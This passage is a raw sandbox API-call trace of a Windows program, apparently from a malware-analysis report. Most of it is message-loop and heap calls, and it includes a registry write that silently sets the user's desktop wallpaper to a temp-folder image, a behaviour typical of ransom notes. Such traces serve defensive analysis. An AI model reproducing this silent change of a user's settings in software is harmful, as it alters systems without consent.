(dwMilliseconds=0xa) [0269.572] timeGetTime () returned 0x11839a9 [0269.572] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0269.572] Sleep (dwMilliseconds=0xa) [0269.638] timeGetTime () returned 0x11839ec [0269.638] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0269.638] Sleep (dwMilliseconds=0xa) [0269.651] timeGetTime () returned 0x11839f8 [0269.652] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0269.652] Sleep (dwMilliseconds=0xa) [0269.667] timeGetTime () returned 0x1183a07 [0269.667] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0269.667] Sleep (dwMilliseconds=0xa) [0269.713] timeGetTime () returned 0x1183a35 [0269.713] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0269.713] Sleep (dwMilliseconds=0xa) [0269.764] timeGetTime () returned 0x1183a69 [0269.764] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0269.764] Sleep (dwMilliseconds=0xa) [0269.781] timeGetTime () returned 0x1183a79 [0269.781] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0269.781] Sleep (dwMilliseconds=0xa) [0269.796] timeGetTime () returned 0x1183a8a [0269.796] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0269.796] Sleep (dwMilliseconds=0xa) [0269.827] timeGetTime () returned 0x1183aa7 [0269.827] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 1 [0269.827] TranslateMessage (lpMsg=0x8cf798) returned 0 [0269.827] DispatchMessageW (lpMsg=0x8cf798) returned 0x0 [0269.827] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0269.827] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0269.828] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0269.828] Sleep (dwMilliseconds=0xa) [0269.840] timeGetTime () returned 0x1183ab4 [0269.840] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0269.840] Sleep (dwMilliseconds=0xa) [0269.855] timeGetTime () returned 0x1183ac4 [0269.855] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0269.855] Sleep (dwMilliseconds=0xa) [0269.918] timeGetTime () returned 0x1183b03 [0269.918] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0269.918] Sleep (dwMilliseconds=0xa) [0269.933] timeGetTime () returned 0x1183b12 [0269.933] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0269.933] Sleep (dwMilliseconds=0xa) [0269.957] timeGetTime () returned 0x1183b2b [0269.957] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0269.957] Sleep (dwMilliseconds=0xa) [0269.969] timeGetTime () returned 0x1183b35 [0269.969] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0269.969] Sleep (dwMilliseconds=0xa) [0269.981] timeGetTime () returned 0x1183b41 [0269.981] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0269.981] Sleep (dwMilliseconds=0xa) [0270.001] timeGetTime () returned 0x1183b56 [0270.001] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.001] Sleep (dwMilliseconds=0xa) [0270.013] timeGetTime () returned 0x1183b62 [0270.013] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.013] Sleep (dwMilliseconds=0xa) [0270.026] timeGetTime () returned 0x1183b6f [0270.026] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.026] Sleep (dwMilliseconds=0xa) [0270.062] timeGetTime () returned 0x1183b93 [0270.062] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.062] Sleep (dwMilliseconds=0xa) [0270.083] timeGetTime () returned 0x1183ba8 [0270.083] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.083] Sleep (dwMilliseconds=0xa) [0270.095] timeGetTime () returned 0x1183bb4 [0270.095] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.095] Sleep (dwMilliseconds=0xa) [0270.176] timeGetTime () returned 0x1183c05 [0270.176] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.176] Sleep (dwMilliseconds=0xa) [0270.290] timeGetTime () returned 0x1183c78 [0270.290] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.290] Sleep (dwMilliseconds=0xa) [0270.313] timeGetTime () returned 0x1183c8f [0270.313] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.313] Sleep (dwMilliseconds=0xa) [0270.373] timeGetTime () returned 0x1183cca [0270.373] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.373] Sleep (dwMilliseconds=0xa) [0270.408] timeGetTime () returned 0x1183ced [0270.409] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.409] Sleep (dwMilliseconds=0xa) [0270.421] timeGetTime () returned 0x1183cf9 [0270.421] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.421] Sleep (dwMilliseconds=0xa) [0270.441] timeGetTime () returned 0x1183d0d [0270.441] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.441] Sleep (dwMilliseconds=0xa) [0270.479] timeGetTime () returned 0x1183d33 [0270.479] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0270.479] Sleep (dwMilliseconds=0xa) [0270.533] timeGetTime () returned 0x1183d6b [0270.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0270.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0270.534] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0270.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0270.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0270.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0270.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0270.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0270.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0270.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0270.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0270.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0270.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0270.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0270.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0270.534] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0270.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0270.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0270.534] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf560 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0270.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0270.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x50) returned 0x2e54858 [0270.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0270.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0270.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0270.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0270.534] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb0) returned 0x978270 [0270.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0270.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0270.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0270.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0270.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0270.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0270.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0270.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0270.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0270.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0270.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0270.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0270.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0270.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0270.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e980 [0270.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0270.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0270.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0270.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0270.535] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0270.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0270.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0270.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0270.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0270.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0270.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0270.536] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8cf850, lpdwDisposition=0x8cf86c | out: phkResult=0x8cf850*=0x2d0, lpdwDisposition=0x8cf86c*=0x2) returned 0x0 [0270.536] RegSetValueExW (in: hKey=0x2d0, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg", cbData=0x54 | out: lpData="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0270.538] RegCloseKey (hKey=0x2d0) returned 0x0 [0270.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e980 | out: hHeap=0x970000) returned 1 [0270.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0270.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0270.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0270.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0270.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0270.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0270.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0270.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0270.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0270.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0270.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0270.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978270 | out: hHeap=0x970000) returned 1 [0270.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0270.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0270.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0270.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0270.539] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0270.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0270.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0270.539] CharUpperBuffW (in: lpsz="_WINAPI_SYSTEMPARAMETERSINFO", cchLength=0x1c | out: lpsz="_WINAPI_SYSTEMPARAMETERSINFO") returned 0x1c [0270.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0270.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0270.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0270.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0270.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0270.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0270.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0270.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0270.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54be8 [0270.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0270.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0270.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0270.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51940 [0270.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0270.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0270.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0270.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0270.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0270.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0270.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0270.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0270.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0270.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51bb0 [0270.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519d0 [0270.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0270.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0270.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0270.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0270.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0270.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0270.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0270.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0270.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0270.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0270.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51928 [0270.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a90 [0270.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0270.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0270.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0270.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0270.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0270.540] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0270.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0270.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0270.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0270.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0270.541] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0270.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0270.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0270.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0270.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0270.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0270.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0270.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0270.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0270.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0270.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0270.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0270.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0270.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0270.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0270.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0270.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0270.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0270.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0270.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0270.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0270.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0270.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0270.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0270.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0270.541] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0270.541] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0270.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0270.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0270.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0270.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0270.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0270.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0270.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0270.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0270.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0270.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0270.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0270.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0270.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0270.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0270.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0270.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0270.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0270.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0270.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0270.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 